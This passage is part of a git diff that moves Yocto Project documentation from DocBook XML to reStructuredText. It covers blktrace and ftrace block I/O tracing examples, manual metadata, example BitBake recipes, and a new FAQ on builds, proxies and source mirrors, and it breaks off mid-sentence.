-                <literallayout class='monospaced'>
-     ^C=== sdc ===
-      CPU  0:                 7691 events,      361 KiB data
-      CPU  1:                 4109 events,      193 KiB data
-      Total:                 11800 events (dropped 0),      554 KiB data
-                </literallayout>
-                On the target system, you should also see a trace
-                summary for the trace just ended:
-                <literallayout class='monospaced'>
-     server: end of run for 192.168.1.43:sdc
-     === sdc ===
-      CPU  0:                 7691 events,      361 KiB data
-      CPU  1:                 4109 events,      193 KiB data
-      Total:                 11800 events (dropped 0),      554 KiB data
-                </literallayout>
-                The blktrace instance on the host will save the target
-                output inside a hostname-timestamp directory:
-                <literallayout class='monospaced'>
-     $ ls -al
-     drwxr-xr-x   10 root     root          1024 Oct 28 02:40 .
-     drwxr-sr-x    4 root     root          1024 Oct 26 18:24 ..
-     drwxr-xr-x    2 root     root          1024 Oct 28 02:40 192.168.1.43-2012-10-28-02:40:56
-                </literallayout>
-                cd into that directory to see the output files:
-                <literallayout class='monospaced'>
-     $ ls -l
-     -rw-r--r--    1 root     root        369193 Oct 28 02:44 sdc.blktrace.0
-     -rw-r--r--    1 root     root        197278 Oct 28 02:44 sdc.blktrace.1
-                </literallayout>
-                And run blkparse on the host system using the device name:
-                <literallayout class='monospaced'>
-     $ blkparse sdc
-
-      8,32   1        1     0.000000000  1263  Q  RM 6016 + 8 [ls]
-      8,32   1        0     0.000036038     0  m   N cfq1263 alloced
-      8,32   1        2     0.000039390  1263  G  RM 6016 + 8 [ls]
-      8,32   1        3     0.000049168  1263  I  RM 6016 + 8 [ls]
-      8,32   1        0     0.000056152     0  m   N cfq1263 insert_request
-      8,32   1        0     0.000061600     0  m   N cfq1263 add_to_rr
-      8,32   1        0     0.000075498     0  m   N cfq workload slice:300
-      .
-      .
-      .
-      8,32   0        0   177.266385696     0  m   N cfq1267 arm_idle: 8 group_idle: 0
-      8,32   0        0   177.266388140     0  m   N cfq schedule dispatch
-      8,32   1        0   177.266679239     0  m   N cfq1267 slice expired t=0
-      8,32   1        0   177.266689297     0  m   N cfq1267 sl_used=9 disp=6 charge=9 iops=0 sect=56
-      8,32   1        0   177.266692649     0  m   N cfq1267 del_from_rr
-      8,32   1        0   177.266696560     0  m   N cfq1267 put_queue
-
-     CPU0 (sdc):
-      Reads Queued:           0,        0KiB	 Writes Queued:         270,   21,708KiB
-      Read Dispatches:       59,    2,628KiB	 Write Dispatches:      495,   39,964KiB
-      Reads Requeued:         0		 Writes Requeued:         0
-      Reads Completed:       90,    2,752KiB	 Writes Completed:      543,   41,596KiB
-      Read Merges:            0,        0KiB	 Write Merges:            9,      344KiB
-      Read depth:             2        	 Write depth:             2
-      IO unplugs:            20        	 Timer unplugs:           1
-     CPU1 (sdc):
-      Reads Queued:         688,    2,752KiB	 Writes Queued:         381,   20,652KiB
-      Read Dispatches:       31,      124KiB	 Write Dispatches:       59,    2,396KiB
-      Reads Requeued:         0		 Writes Requeued:         0
-      Reads Completed:        0,        0KiB	 Writes Completed:       11,      764KiB
-      Read Merges:          598,    2,392KiB	 Write Merges:           88,      448KiB
-      Read depth:             2        	 Write depth:             2
-      IO unplugs:            52        	 Timer unplugs:           0
-
-     Total (sdc):
-      Reads Queued:         688,    2,752KiB	 Writes Queued:         651,   42,360KiB
-      Read Dispatches:       90,    2,752KiB	 Write Dispatches:      554,   42,360KiB
-      Reads Requeued:         0		 Writes Requeued:         0
-      Reads Completed:       90,    2,752KiB	 Writes Completed:      554,   42,360KiB
-      Read Merges:          598,    2,392KiB	 Write Merges:           97,      792KiB
-      IO unplugs:            72        	 Timer unplugs:           1
-
-     Throughput (R/W): 15KiB/s / 238KiB/s
-     Events (sdc): 9,301 entries
-     Skips: 0 forward (0 -   0.0%)
-                </literallayout>
-                You should see the trace events and summary just as
-                you would have if you'd run the same command on the target.
-            </para>
-        </section>
-
-        <section id='tracing-block-io-via-ftrace'>
-            <title>Tracing Block I/O via 'ftrace'</title>
-
-            <para>
-                It's also possible to trace block I/O using only
-                <link linkend='the-trace-events-subsystem'>trace events subsystem</link>,
-                which can be useful for casual tracing
-                if you don't want to bother dealing with the userspace tools.
-            </para>
-
-            <para>
-                To enable tracing for a given device, use
-                /sys/block/xxx/trace/enable, where xxx is the device name.
-                This for example enables tracing for /dev/sdc:
-                <literallayout class='monospaced'>
-     root@crownbay:/sys/kernel/debug/tracing# echo 1 > /sys/block/sdc/trace/enable
-                </literallayout>
-                Once you've selected the device(s) you want to trace,
-                selecting the 'blk' tracer will turn the blk tracer on:
-                <literallayout class='monospaced'>
-     root@crownbay:/sys/kernel/debug/tracing# cat available_tracers
-     blk function_graph function nop
-
-     root@crownbay:/sys/kernel/debug/tracing# echo blk > current_tracer
-                </literallayout>
-                Execute the workload you're interested in:
-                <literallayout class='monospaced'>
-     root@crownbay:/sys/kernel/debug/tracing# cat /media/sdc/testfile.txt
-                </literallayout>
-                And look at the output (note here that we're using
-                'trace_pipe' instead of trace to capture this trace -
-                this allows us to wait around on the pipe for data to
-                appear):
-                <literallayout class='monospaced'>
-     root@crownbay:/sys/kernel/debug/tracing# cat trace_pipe
-                 cat-3587  [001] d..1  3023.276361:   8,32   Q   R 1699848 + 8 [cat]
-                 cat-3587  [001] d..1  3023.276410:   8,32   m   N cfq3587 alloced
-                 cat-3587  [001] d..1  3023.276415:   8,32   G   R 1699848 + 8 [cat]
-                 cat-3587  [001] d..1  3023.276424:   8,32   P   N [cat]
-                 cat-3587  [001] d..2  3023.276432:   8,32   I   R 1699848 + 8 [cat]
-                 cat-3587  [001] d..1  3023.276439:   8,32   m   N cfq3587 insert_request
-                 cat-3587  [001] d..1  3023.276445:   8,32   m   N cfq3587 add_to_rr
-                 cat-3587  [001] d..2  3023.276454:   8,32   U   N [cat] 1
-                 cat-3587  [001] d..1  3023.276464:   8,32   m   N cfq workload slice:150
-                 cat-3587  [001] d..1  3023.276471:   8,32   m   N cfq3587 set_active wl_prio:0 wl_type:2
-                 cat-3587  [001] d..1  3023.276478:   8,32   m   N cfq3587 fifo=  (null)
-                 cat-3587  [001] d..1  3023.276483:   8,32   m   N cfq3587 dispatch_insert
-                 cat-3587  [001] d..1  3023.276490:   8,32   m   N cfq3587 dispatched a request
-                 cat-3587  [001] d..1  3023.276497:   8,32   m   N cfq3587 activate rq, drv=1
-                 cat-3587  [001] d..2  3023.276500:   8,32   D   R 1699848 + 8 [cat]
-                </literallayout>
-                And this turns off tracing for the specified device:
-                <literallayout class='monospaced'>
-     root@crownbay:/sys/kernel/debug/tracing# echo 0 > /sys/block/sdc/trace/enable
-                </literallayout>
-            </para>
-        </section>
-    </section>
-
-    <section id='blktrace-documentation'>
-        <title>Documentation</title>
-
-        <para>
-            Online versions of the man pages for the commands discussed
-            in this section can be found here:
-            <itemizedlist>
-                <listitem><para><ulink url='http://linux.die.net/man/8/blktrace'>http://linux.die.net/man/8/blktrace</ulink>
-                    </para></listitem>
-                <listitem><para><ulink url='http://linux.die.net/man/1/blkparse'>http://linux.die.net/man/1/blkparse</ulink>
-                    </para></listitem>
-                <listitem><para><ulink url='http://linux.die.net/man/8/btrace'>http://linux.die.net/man/8/btrace</ulink>
-                    </para></listitem>
-            </itemizedlist>
-        </para>
-
-        <para>
-            The above manpages, along with manpages for the other
-            blktrace utilities (btt, blkiomon, etc) can be found in the
-            /doc directory of the blktrace tools git repo:
-            <literallayout class='monospaced'>
-     $ git clone git://git.kernel.dk/blktrace.git
-            </literallayout>
-        </para>
-    </section>
-</section>
-</chapter>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/profile-manual/profile-manual.rst b/documentation/profile-manual/profile-manual.rst
new file mode 100644
index 0000000000..5ec5b9e759
--- /dev/null
+++ b/documentation/profile-manual/profile-manual.rst
@@ -0,0 +1,19 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+==========================================
+Yocto Project Profiling and Tracing Manual
+==========================================
+
+|
+
+.. toctree::
+   :caption: Table of Contents
+   :numbered:
+
+   profile-manual-intro
+   profile-manual-arch
+   profile-manual-usage
+   profile-manual-examples
+   history
+
+.. include:: /boilerplate.rst
diff --git a/documentation/profile-manual/profile-manual.xml b/documentation/profile-manual/profile-manual.xml
deleted file mode 100755
index 39cdb817d9..0000000000
--- a/documentation/profile-manual/profile-manual.xml
+++ /dev/null
@@ -1,199 +0,0 @@
-<!DOCTYPE book PUBLIC "-//OASIS//DTD DocBook XML V4.2//EN"
-"http://www.oasis-open.org/docbook/xml/4.2/docbookx.dtd"
-[<!ENTITY % poky SYSTEM "../poky.ent"> %poky; ] >
-
-<book id='profile-manual' lang='en'
-      xmlns:xi="http://www.w3.org/2003/XInclude"
-      xmlns="http://docbook.org/ns/docbook"
-      >
-    <bookinfo>
-
-        <mediaobject>
-            <imageobject>
-                <imagedata fileref='figures/profile-title.png'
-                    format='SVG'
-                    align='left' scalefit='1' width='100%'/>
-            </imageobject>
-        </mediaobject>
-
-        <title>
-		  Yocto Project Profiling and Tracing Manual
-		</title>
-
-        <authorgroup>
-            <author>
-                <affiliation>
-                    <orgname>&ORGNAME;</orgname>
-                </affiliation>
-                <email>&ORGEMAIL;</email>
-            </author>
-        </authorgroup>
-
-        <revhistory>
-            <revision>
-                <revnumber>1.4</revnumber>
-                <date>April 2013</date>
-                <revremark>The initial document released with the Yocto Project 1.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.5</revnumber>
-                <date>October 2013</date>
-                <revremark>Released with the Yocto Project 1.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.6</revnumber>
-                <date>April 2014</date>
-                <revremark>Released with the Yocto Project 1.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.7</revnumber>
-                <date>October 2014</date>
-                <revremark>Released with the Yocto Project 1.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>1.8</revnumber>
-                <date>April 2015</date>
-                <revremark>Released with the Yocto Project 1.8 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.0</revnumber>
-                <date>October 2015</date>
-                <revremark>Released with the Yocto Project 2.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.1</revnumber>
-                <date>April 2016</date>
-                <revremark>Released with the Yocto Project 2.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.2</revnumber>
-                <date>October 2016</date>
-                <revremark>Released with the Yocto Project 2.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.3</revnumber>
-                <date>May 2017</date>
-                <revremark>Released with the Yocto Project 2.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.4</revnumber>
-                <date>October 2017</date>
-                <revremark>Released with the Yocto Project 2.4 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.5</revnumber>
-                <date>May 2018</date>
-                <revremark>Released with the Yocto Project 2.5 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.6</revnumber>
-                <date>November 2018</date>
-                <revremark>Released with the Yocto Project 2.6 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>2.7</revnumber>
-                <date>May 2019</date>
-                <revremark>Released with the Yocto Project 2.7 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.0</revnumber>
-                <date>October 2019</date>
-                <revremark>Released with the Yocto Project 3.0 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1</revnumber>
-                <date>April 2020</date>
-                <revremark>Released with the Yocto Project 3.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.1</revnumber>
-                <date>June 2020</date>
-                <revremark>Released with the Yocto Project 3.1.1 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.2</revnumber>
-                <date>August 2020</date>
-                <revremark>Released with the Yocto Project 3.1.2 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.3</revnumber>
-                <date>October 2020</date>
-                <revremark>Released with the Yocto Project 3.1.3 Release.</revremark>
-            </revision>
-            <revision>
-                <revnumber>3.1.4</revnumber>
-                <date>&REL_MONTH_YEAR;</date>
-                <revremark>Released with the Yocto Project 3.1.4 Release.</revremark>
-            </revision>
-        </revhistory>
-
-    <copyright>
-     <year>&COPYRIGHT_YEAR;</year>
-      <holder>Linux Foundation</holder>
-    </copyright>
-
-    <legalnotice>
-      <para>
-          Permission is granted to copy, distribute and/or modify this document under
-          the terms of the <ulink type="http" url="http://creativecommons.org/licenses/by-sa/2.0/uk/">
-          Creative Commons Attribution-Share Alike 2.0 UK: England &amp; Wales</ulink> as published by
-          Creative Commons.
-      </para>
-           <note><title>Manual Notes</title>
-               <itemizedlist>
-                   <listitem><para>
-                       This version of the
-                       <emphasis>Yocto Project Profiling and Tracing Manual</emphasis>
-                       is for the &YOCTO_DOC_VERSION; release of the
-                       Yocto Project.
-                       To be sure you have the latest version of the manual
-                       for this release, go to the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual from that site.
-                       Manuals from the site are more up-to-date than manuals
-                       derived from the Yocto Project released TAR files.
-                       </para></listitem>
-                   <listitem><para>
-                       If you located this manual through a web search, the
-                       version of the manual might not be the one you want
-                       (e.g. the search might have returned a manual much
-                       older than the Yocto Project version with which you
-                       are working).
-                       You can see all Yocto Project major releases by
-                       visiting the
-                       <ulink url='&YOCTO_WIKI_URL;/wiki/Releases'>Releases</ulink>
-                       page.
-                       If you need a version of this manual for a different
-                       Yocto Project release, visit the
-                       <ulink url='&YOCTO_DOCS_URL;'>Yocto Project documentation page</ulink>
-                       and select the manual set by using the
-                       "ACTIVE RELEASES DOCUMENTATION" or "DOCUMENTS ARCHIVE"
-                       pull-down menus.
-                       </para></listitem>
-                   <listitem>
-                       <para>
-                       To report any inaccuracies or problems with this
-                       (or any other Yocto Project) manual, send an email to
-                       the Yocto Project documentation mailing list at
-                       <filename>docs@lists.yoctoproject.org</filename> or
-                       log into the freenode <filename>#yocto</filename> channel.
-                       </para>
-                   </listitem>
-               </itemizedlist>
-           </note>
-    </legalnotice>
-
-    </bookinfo>
-
-    <xi:include href="profile-manual-intro.xml"/>
-
-    <xi:include href="profile-manual-arch.xml"/>
-
-    <xi:include href="profile-manual-usage.xml"/>
-
-    <xi:include href="profile-manual-examples.xml"/>
-
-</book>
-<!--
-vim: expandtab tw=80 ts=4
--->
diff --git a/documentation/ref-manual/examples/hello-autotools/hello_2.10.bb b/documentation/ref-manual/examples/hello-autotools/hello_2.10.bb
new file mode 100644
index 0000000000..aa2beb9a9b
--- /dev/null
+++ b/documentation/ref-manual/examples/hello-autotools/hello_2.10.bb
@@ -0,0 +1,9 @@
+DESCRIPTION = "GNU Helloworld application"
+SECTION = "examples"
+LICENSE = "GPLv3"
+LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504"
+
+SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.gz"
+SRC_URI[sha256sum] = "31e066137a962676e89f69d1b65382de95a7ef7d914b8cb956f41ea72e0f516b"
+
+inherit autotools-brokensep gettext
diff --git a/documentation/ref-manual/examples/hello-autotools/hello_2.3.bb b/documentation/ref-manual/examples/hello-autotools/hello_2.3.bb
deleted file mode 100644
index 5dfb0b30cf..0000000000
--- a/documentation/ref-manual/examples/hello-autotools/hello_2.3.bb
+++ /dev/null
@@ -1,8 +0,0 @@
-DESCRIPTION = "GNU Helloworld application"
-SECTION = "examples"
-LICENSE = "GPLv3"
-LIC_FILES_CHKSUM = "file://COPYING;md5=adefda309052235aa5d1e99ce7557010"
-
-SRC_URI = "${GNU_MIRROR}/hello/hello-${PV}.tar.bz2"
-
-inherit autotools
diff --git a/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb b/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb
index b58d4d7bd1..c0c8986405 100644
--- a/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb
+++ b/documentation/ref-manual/examples/libxpm/libxpm_3.5.6.bb
@@ -1,4 +1,4 @@
-require xorg-lib-common.inc
+require recipes-graphics/xorg-lib/xorg-lib-common.inc
 
 DESCRIPTION = "X11 Pixmap library"
 LICENSE = "X-BSD"
diff --git a/documentation/ref-manual/faq.rst b/documentation/ref-manual/faq.rst
new file mode 100644
index 0000000000..8c2b34be5f
--- /dev/null
+++ b/documentation/ref-manual/faq.rst
@@ -0,0 +1,464 @@
+.. SPDX-License-Identifier: CC-BY-SA-2.0-UK
+
+***
+FAQ
+***
+
+**Q:** How does Poky differ from :oe_home:`OpenEmbedded <>`?
+
+**A:** The term ``Poky`` refers to the specific reference build
+system that the Yocto Project provides. Poky is based on
+:term:`OpenEmbedded-Core (OE-Core)` and :term:`BitBake`. Thus, the
+generic term used here for the build system is the "OpenEmbedded build
+system." Development in the Yocto Project using Poky is closely tied to
+OpenEmbedded, with changes always being merged to OE-Core or BitBake
+first before being pulled back into Poky. This practice benefits both
+projects immediately.
+
+**Q:** My development system does not meet the required Git, tar, and
+Python versions. In particular, I do not have Python 3.5.0 or greater.
+Can I still use the Yocto Project?
+
+**A:** You can get the required tools on your host development system a
+couple different ways (i.e. building a tarball or downloading a
+tarball). See the
+":ref:`ref-manual/ref-system-requirements:required git, tar, python and gcc versions`"
+section for steps on how to update your build tools.
+
+**Q:** How can you claim Poky / OpenEmbedded-Core is stable?
+
+**A:** There are three areas that help with stability;
+
+-  The Yocto Project team keeps :term:`OpenEmbedded-Core (OE-Core)` small and
+   focused, containing around 830 recipes as opposed to the thousands
+   available in other OpenEmbedded community layers. Keeping it small
+   makes it easy to test and maintain.
+
+-  The Yocto Project team runs manual and automated tests using a small,
+   fixed set of reference hardware as well as emulated targets.
+
+-  The Yocto Project uses an autobuilder, which provides continuous
+   build and integration tests.
+
+**Q:** How do I get support for my board added to the Yocto Project?
+
+**A:** Support for an additional board is added by creating a Board
+Support Package (BSP) layer for it. For more information on how to
+create a BSP layer, see the
+":ref:`dev-manual/dev-manual-common-tasks:understanding and creating layers`"
+section in the Yocto Project Development Tasks Manual and the
+:doc:`../bsp-guide/bsp-guide`.
+
+Usually, if the board is not completely exotic, adding support in the
+Yocto Project is fairly straightforward.
+
+**Q:** Are there any products built using the OpenEmbedded build system?
+
+**A:** The software running on the `Vernier
+LabQuest <http://vernier.com/labquest/>`__ is built using the
+OpenEmbedded build system. See the `Vernier
+LabQuest <http://www.vernier.com/products/interfaces/labq/>`__ website
+for more information. There are a number of pre-production devices using
+the OpenEmbedded build system and the Yocto Project team announces them
+as soon as they are released.
+
+**Q:** What does the OpenEmbedded build system produce as output?
+
+**A:** Because you can use the same set of recipes to create output of
+various formats, the output of an OpenEmbedded build depends on how you
+start it. Usually, the output is a flashable image ready for the target
+device.
+
+**Q:** How do I add my package to the Yocto Project?
+
+**A:** To add a package, you need to create a BitBake recipe. For
+information on how to create a BitBake recipe, see the
+":ref:`dev-manual/dev-manual-common-tasks:writing a new recipe`"
+section in the Yocto Project Development Tasks Manual.
+
+**Q:** Do I have to reflash my entire board with a new Yocto Project
+image when recompiling a package?
+
+**A:** The OpenEmbedded build system can build packages in various
+formats such as IPK for OPKG, Debian package (``.deb``), or RPM. You can
+then upgrade the packages using the package tools on the device, much
+like on a desktop distribution such as Ubuntu or Fedora. However,
+package management on the target is entirely optional.
+
+**Q:** I see the error
+'``chmod: XXXXX new permissions are r-xrwxrwx, not r-xr-xr-x``'. What is
+wrong?
+
+**A:** You are probably running the build on an NTFS filesystem. Use
+``ext2``, ``ext3``, or ``ext4`` instead.
+
+**Q:** I see lots of 404 responses for files when the OpenEmbedded build
+system is trying to download sources. Is something wrong?
+
+**A:** Nothing is wrong. The OpenEmbedded build system checks any
+configured source mirrors before downloading from the upstream sources.
+The build system does this searching for both source archives and
+pre-checked out versions of SCM-managed software. These checks help in
+large installations because it can reduce load on the SCM servers
+themselves. The address above is one of the default mirrors configured
+into the build system. Consequently, if an upstream source disappears,
+the team can place sources there so builds continue to work.
+
+**Q:** I have machine-specific data in a package for one machine only
+but the package is being marked as machine-specific in all cases, how do
+I prevent this?
+
+**A:** Set ``SRC_URI_OVERRIDES_PACKAGE_ARCH`` = "0" in the ``.bb`` file
+but make sure the package is manually marked as machine-specific for the
+case that needs it. The code that handles
+``SRC_URI_OVERRIDES_PACKAGE_ARCH`` is in the
+``meta/classes/base.bbclass`` file.
+
+**Q:** I'm behind a firewall and need to use a proxy server. How do I do
+that?
+
+**A:** Most source fetching by the OpenEmbedded build system is done by
+``wget`` and you therefore need to specify the proxy settings in a
+``.wgetrc`` file, which can be in your home directory if you are a
+single user or can be in ``/usr/local/etc/wgetrc`` as a global user
+file.
+
+Following is the applicable code for setting various proxy types in the
+``.wgetrc`` file. By default, these settings are disabled with comments.
+To use them, remove the comments: ::
+
+   # You can set the default proxies for Wget to use for http, https, and ftp.
+   # They will override the value in the environment.
+   #https_proxy = http://proxy.yoyodyne.com:18023/
+   #http_proxy = http://proxy.yoyodyne.com:18023/
+   #ftp_proxy = http://proxy.yoyodyne.com:18023/
+
+   # If you do not want to use proxy at all, set this to off.
+   #use_proxy = on
+
+The Yocto Project also includes a
+``meta-poky/conf/site.conf.sample`` file that shows how to configure CVS
+and Git proxy servers if needed. For more information on setting up
+various proxy types and configuring proxy servers, see the
+":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+Wiki page.
+
+**Q:** What's the difference between target and target\ ``-native``?
+
+**A:** The ``*-native`` targets are designed to run on the system being
+used for the build. These are usually tools that are needed to assist
+the build in some way such as ``quilt-native``, which is used to apply
+patches. The non-native version is the one that runs on the target
+device.
+
+**Q:** I'm seeing random build failures. Help?!
+
+**A:** If the same build is failing in totally different and random
+ways, the most likely explanation is:
+
+-  The hardware you are running the build on has some problem.
+
+-  You are running the build under virtualization, in which case the
+   virtualization probably has bugs.
+
+The OpenEmbedded build system processes a massive amount of data that
+causes lots of network, disk and CPU activity and is sensitive to even
+single-bit failures in any of these areas. True random failures have
+always been traced back to hardware or virtualization issues.
+
+**Q:** When I try to build a native recipe, the build fails with
+``iconv.h`` problems.
+
+**A:** If you get an error message that indicates GNU ``libiconv`` is
+not in use but ``iconv.h`` has been included from ``libiconv``, you need
+to check to see if you have a previously installed version of the header
+file in ``/usr/local/include``.
+::
+
+   #error GNU libiconv not in use but included iconv.h is from libiconv
+
+If you find a previously installed
+file, you should either uninstall it or temporarily rename it and try
+the build again.
+
+This issue is just a single manifestation of "system leakage" issues
+caused when the OpenEmbedded build system finds and uses previously
+installed files during a native build. This type of issue might not be
+limited to ``iconv.h``. Be sure that leakage cannot occur from
+``/usr/local/include`` and ``/opt`` locations.
+
+**Q:** What do we need to ship for license compliance?
+
+**A:** This is a difficult question and you need to consult your lawyer
+for the answer for your specific case. It is worth bearing in mind that
+for GPL compliance, there needs to be enough information shipped to
+allow someone else to rebuild and produce the same end result you are
+shipping. This means sharing the source code, any patches applied to it,
+and also any configuration information about how that package was
+configured and built.
+
+You can find more information on licensing in the
+":ref:`overview-manual/overview-manual-development-environment:licensing`"
+section in the Yocto
+Project Overview and Concepts Manual and also in the
+":ref:`dev-manual/dev-manual-common-tasks:maintaining open source license compliance during your product's lifecycle`"
+section in the Yocto Project Development Tasks Manual.
+
+**Q:** How do I disable the cursor on my touchscreen device?
+
+**A:** You need to create a form factor file as described in the
+":ref:`bsp-filelayout-misc-recipes`" section in
+the Yocto Project Board Support Packages (BSP) Developer's Guide. Set
+the ``HAVE_TOUCHSCREEN`` variable equal to one as follows:
+::
+
+   HAVE_TOUCHSCREEN=1
+
+**Q:** How do I make sure connected network interfaces are brought up by
+default?
+
+**A:** The default interfaces file provided by the netbase recipe does
+not automatically bring up network interfaces. Therefore, you will need
+to add a BSP-specific netbase that includes an interfaces file. See the
+":ref:`bsp-filelayout-misc-recipes`" section in
+the Yocto Project Board Support Packages (BSP) Developer's Guide for
+information on creating these types of miscellaneous recipe files.
+
+For example, add the following files to your layer: ::
+
+   meta-MACHINE/recipes-bsp/netbase/netbase/MACHINE/interfaces
+   meta-MACHINE/recipes-bsp/netbase/netbase_5.0.bbappend
+
+**Q:** How do I create images with more free space?
+
+**A:** By default, the OpenEmbedded build system creates images that are
+1.3 times the size of the populated root filesystem. To affect the image
+size, you need to set various configurations:
+
+-  *Image Size:* The OpenEmbedded build system uses the
+   :term:`IMAGE_ROOTFS_SIZE` variable to define
+   the size of the image in Kbytes. The build system determines the size
+   by taking into account the initial root filesystem size before any
+   modifications such as requested size for the image and any requested
+   additional free disk space to be added to the image.
+
+-  *Overhead:* Use the
+   :term:`IMAGE_OVERHEAD_FACTOR` variable
+   to define the multiplier that the build system applies to the initial
+   image size, which is 1.3 by default.
+
+-  *Additional Free Space:* Use the
+   :term:`IMAGE_ROOTFS_EXTRA_SPACE`
+   variable to add additional free space to the image. The build system
+   adds this space to the image after it determines its
+   ``IMAGE_ROOTFS_SIZE``.
+
+**Q:** Why don't you support directories with spaces in the pathnames?
+
+**A:** The Yocto Project team has tried to do this before but too many
+of the tools the OpenEmbedded build system depends on, such as
+``autoconf``, break when they find spaces in pathnames. Until that
+situation changes, the team will not support spaces in pathnames.
+
+**Q:** How do I use an external toolchain?
+
+**A:** The toolchain configuration is very flexible and customizable. It
+is primarily controlled with the ``TCMODE`` variable. This variable
+controls which ``tcmode-*.inc`` file to include from the
+``meta/conf/distro/include`` directory within the :term:`Source Directory`.
+
+The default value of ``TCMODE`` is "default", which tells the
+OpenEmbedded build system to use its internally built toolchain (i.e.
+``tcmode-default.inc``). However, other patterns are accepted. In
+particular, "external-\*" refers to external toolchains. One example is
+the Sourcery G++ Toolchain. The support for this toolchain resides in
+the separate ``meta-sourcery`` layer at
+http://github.com/MentorEmbedded/meta-sourcery/.
+
+In addition to the toolchain configuration, you also need a
+corresponding toolchain recipe file. This recipe file needs to package
+up any pre-built objects in the toolchain such as ``libgcc``,
+``libstdcc++``, any locales, and ``libc``.
+
+**Q:** How does the OpenEmbedded build system obtain source code and
+will it work behind my firewall or proxy server?
+
+**A:** The way the build system obtains source code is highly
+configurable. You can setup the build system to get source code in most
+environments if HTTP transport is available.
+
+When the build system searches for source code, it first tries the local
+download directory. If that location fails, Poky tries
+:term:`PREMIRRORS`, the upstream source, and then
+:term:`MIRRORS` in that order.
+
+Assuming your distribution is "poky", the OpenEmbedded build system uses
+the Yocto Project source ``PREMIRRORS`` by default for SCM-based
+sources, upstreams for normal tarballs, and then falls back to a number
+of other mirrors including the Yocto Project source mirror if those
+fail.
+
+As an example, you could add a specific server for the build system to
+attempt before any others by adding something like the following to the
+``local.conf`` configuration file: ::
+
+   PREMIRRORS_prepend = "\
+       git://.*/.* http://www.yoctoproject.org/sources/ \n \
+       ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+       http://.*/.* http://www.yoctoproject.org/sources/ \n \
+       https://.*/.* http://www.yoctoproject.org/sources/ \n"
+
+These changes cause the build system to intercept Git, FTP, HTTP, and
+HTTPS requests and direct them to the ``http://`` sources mirror. You
+can use ``file://`` URLs to point to local directories or network shares
+as well.
+
+Aside from the previous technique, these options also exist:
+::
+
+   BB_NO_NETWORK = "1"
+
+This statement tells BitBake to issue an error
+instead of trying to access the Internet. This technique is useful if
+you want to ensure code builds only from local sources.
+
+Here is another technique:
+::
+
+   BB_FETCH_PREMIRRORONLY = "1"
+
+This statement
+limits the build system to pulling source from the ``PREMIRRORS`` only.
+Again, this technique is useful for reproducing builds.
+
+Here is another technique:
+::
+
+   BB_GENERATE_MIRROR_TARBALLS = "1"
+
+This
+statement tells the build system to generate mirror tarballs. This
+technique is useful if you want to create a mirror server. If not,
+however, the technique can simply waste time during the build.
+
+Finally, consider an example where you are behind an HTTP-only firewall.
+You could make the following changes to the ``local.conf`` configuration
+file as long as the ``PREMIRRORS`` server is current: ::
+
+   PREMIRRORS_prepend = "\
+       ftp://.*/.* http://www.yoctoproject.org/sources/ \n \
+       http://.*/.* http://www.yoctoproject.org/sources/ \n \
+       https://.*/.* http://www.yoctoproject.org/sources/ \n"
+   BB_FETCH_PREMIRRORONLY = "1"
+
+These changes would cause the build system to successfully fetch source
+over HTTP and any network accesses to anything other than the
+``PREMIRRORS`` would fail.
+
+The build system also honors the standard shell environment variables
+``http_proxy``, ``ftp_proxy``, ``https_proxy``, and ``all_proxy`` to
+redirect requests through proxy servers.
+
+.. note::
+
+   You can find more information on the
+   ":yocto_wiki:`Working Behind a Network Proxy </wiki/Working_Behind_a_Network_Proxy>`"
+   Wiki page.
+
+**Q:** Can I get rid of build output so I can start over?
+
+**A:** Yes - you can easily do this. When you use BitBake to build an
+image, all the build output goes into the directory created when you run
+the build environment setup script (i.e.
+:ref:`structure-core-script`). By default, this :term:`Build Directory`
+is named ``build`` but can be named
+anything you want.
+
+Within the Build Directory, is the ``tmp`` directory. To remove all the
+build output yet preserve any source code or downloaded files from
+previous builds, simply remove the ``tmp`` directory.
+
+**Q:** Why do ``${bindir}`` and ``${libdir}`` have strange values for
+``-native`` recipes?
+
+**A:** Executables and libraries might need to be used from a directory
+other than the directory into which they were initially installed.
+Complicating this situation is the fact that sometimes these executables
+and libraries are compiled with the expectation of being run from that
+initial installation target directory. If this is the case, moving them
+causes problems.
+
+This scenario is a fundamental problem for package maintainers of
+mainstream Linux distributions as well as for the OpenEmbedded build
+system. As such, a well-established solution exists. Makefiles,
+Autotools configuration scripts, and other build systems are expected to
+respect environment variables such as ``bindir``, ``libdir``, and
+``sysconfdir`` that indicate where executables, libraries, and data
+reside when a program is actually run. They are also expected to respect
+a ``DESTDIR`` environment variable, which is prepended to all the other
+variables when the build system actually installs the files. It is
+understood that the program does not actually run from within
+``DESTDIR``.
+
+When the OpenEmbedded build system uses a recipe to build a
+target-architecture program (i.e. one that is intended for inclusion on
+the image being built), that program eventually runs from the root file
+system of that image. Thus, the build system provides a value of
